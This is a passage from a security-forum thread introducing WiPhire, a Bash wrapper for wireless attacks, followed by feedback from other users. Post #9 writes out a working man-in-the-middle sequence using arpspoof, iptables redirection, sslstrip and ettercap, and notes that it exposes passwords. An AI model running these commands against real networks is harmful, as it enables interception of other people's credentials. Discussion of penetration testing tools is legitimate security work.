Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: WiPhire - Wireless Pentesting Tool

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    17

    Default WiPhire - Wireless Pentesting Tool






    WiPhire is a Bash script aimed at making all of the standard wireless attacks a lot easier to perform.


    Requirements:

    This script was written on Backtrack 4 and designed to be used with Backtrack 4. You can try to run it on other OS's but I will not be modifying this for any other OS; you will have to do that yourself. This was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite you will need to put it into monitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. You can do this with 'airmon-ng start <interface>'. Also do note that this script needs to be ran as root.


    Programs that WiPhire Uses:

    - airmon-ng
    - airodump-ng
    - aireplay-ng
    - aircrack-ng
    - airdrop-ng (Requires directory /pentest/wireless/airdrop-ng/)
    - xterm
    - crunch (Requires directory /pentest/passwords/crunch)
    - pyrit
    - sslstrip
    - arpspoof
    - macchanger
    - kate
    - apache2 (Requires directory /etc/init.d/apache2)
    - ettercap
    - firefox (Trivial)

    Usage:

    To use this Bash script (Or any Bash script) You need to take the script and place it somewhere that you can remember. For this example i will just use /root/. Now if you are root and you have the script on your desktop, open up a terminal and type ./WiPhire. This will now run the script. If you get a permissions error you will need to change the permissions to make the script executable 'chmod 777 ./WiPhire' This will now allow you to run it. If the script is stored in a different location you need to change the directory to the location before running the script. For example if the script was in a folder called 'scripts' on roots desktop we would run 'cd /root/scripts/' Then we would run './WiPhire'.

    https://sourceforge.net/projects/wiphire/

    Middle

  2. #2
    Just burned his ISO zeroday's Avatar
    Join Date
    Jan 2010
    Posts
    1

    Default Re: WiPhire - Wireless Pentesting Tool

    Do you have any plans on developing this any further? If so, what can we can we hope to see in the future.

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: WiPhire - Wireless Pentesting Tool

    Not sure we need *another* one of these however if you want the submission of your tool to be taken seriously you have to point out why your tool is better than some of the current ones and what does it do that the other tools do not.

  4. #4
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    17

    Default Re: WiPhire - Wireless Pentesting Tool

    For future versions on this, i intend to make it it even more user friendly and allow a greater variety options to be available for the individual operations. So for example include cpyrit set up with a GPU, alternate methods of generating packets for WEP cracking, more in depth options for DNS spoofing, more options for MITM attacks and maybe including a utility for mdk3. Also i would like to incorporate any new methods and techniques discovered in the coming months/years.

    The idea for WiPhire is that it becomes the wireless equivalent of SET (Social Engineers Toolkit), If you look at SET and WiPhire you can see that they are both trying to be an all encompassing tool for the subject. The idea is that WiPhire will have an option for every major wireless operation.

    To be honest i haven't really seen many scripts of this caliber in the wireless field. I have seen quite a few WEP cracking scripts and a couple of MITM scripts, but there isn't anything to my knowledge that has everything in one package.

    I would like some feed back as to what needs to be improved/included in future versions, so any one who has downloaded a response would be great!

    Thanks

  5. #5
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: WiPhire - Wireless Pentesting Tool

    I liked your solution for finding the wireless cards. needs a bit more development but its the right idea. also LOL at redirecting to fbi.gov. I know its harmless but you might want to take that out.

    Quote Originally Posted by Middle View Post
    For future versions on this, i intend to make it it even more user friendly and allow a greater variety options to be available for the individual operations. So for example include cpyrit set up with a GPU, alternate methods of generating packets for WEP cracking, more in depth options for DNS spoofing, more options for MITM attacks and maybe including a utility for mdk3. Also i would like to incorporate any new methods and techniques discovered in the coming months/years.

    The idea for WiPhire is that it becomes the wireless equivalent of SET (Social Engineers Toolkit), If you look at SET and WiPhire you can see that they are both trying to be an all encompassing tool for the subject. The idea is that WiPhire will have an option for every major wireless operation.

    To be honest i haven't really seen many scripts of this caliber in the wireless field. I have seen quite a few WEP cracking scripts and a couple of MITM scripts, but there isn't anything to my knowledge that has everything in one package.

    I would like some feed back as to what needs to be improved/included in future versions, so any one who has downloaded a response would be great!

    Thanks
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  6. #6
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    17

    Default Re: WiPhire - Wireless Pentesting Tool

    Thanks a lot for the feedback i was starting to think that i would never hear any!

    I think that if i can generate some interest and have it seriously considered for inclusion with Backtrack then i will go through it and make it as polished as i can! It is so annoying that no matter how many times you check something, prior to its release you will notice another problem...

    I have had 136 downloads form my source forge page alone, and i have not advertised that page any where else to thanks a lot guys! In total i have had over 300 downloads in just under two weeks =]

    Any more feedback would be greatly appreciated!

  7. #7
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: WiPhire - Wireless Pentesting Tool

    I do actually plan to test it my self because from the menu/post if it behaves as advertised it seems like it would be cool. I just have not had the time recently but it is on my to do list and i will leave some feed back here.

  8. #8
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    17

    Default Re: WiPhire - Wireless Pentesting Tool

    So anyone tried it out yet?

    I would really appreciate feedback

  9. #9
    Just burned his ISO
    Join Date
    May 2010
    Location
    cyberspace
    Posts
    10

    Default Re: WiPhire - Wireless Pentesting Tool

    hey mann i tried wiphire it's a dream coming true for me 10x for your script i rly adore it but i have a suggestion if you can make the mitm in a different way like gotmilk did look what i mean: kate /etc/etter.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    in this method the password appear in ethercap without searching

  10. #10
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    1

    Default Re: WiPhire - Wireless Pentesting Tool

    nice share

Page 1 of 2 12 LastLast

Similar Threads

  1. sectool : Tool for Security Audit Tool and IDS
    By firebits in forum Tool Requests
    Replies: 3
    Last Post: 01-27-2011, 11:23 AM
  2. A tool which automates wireless assessment
    By wif1bust3r in forum OLD Newbie Area
    Replies: 6
    Last Post: 06-07-2009, 11:14 AM
  3. Portable Wireless Security and PenTesting - Suggestions?
    By Oneiroi in forum OLD Newbie Area
    Replies: 12
    Last Post: 07-10-2008, 02:41 AM
  4. Tool request: NSAT (network security analysis tool)
    By williamc in forum OLD BT3beta General
    Replies: 10
    Last Post: 06-03-2008, 04:33 PM
  5. Wep0ff - Wireless WEP Key Cracker Tool
    By drpepperONE in forum OLD Wireless
    Replies: 0
    Last Post: 01-26-2008, 01:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •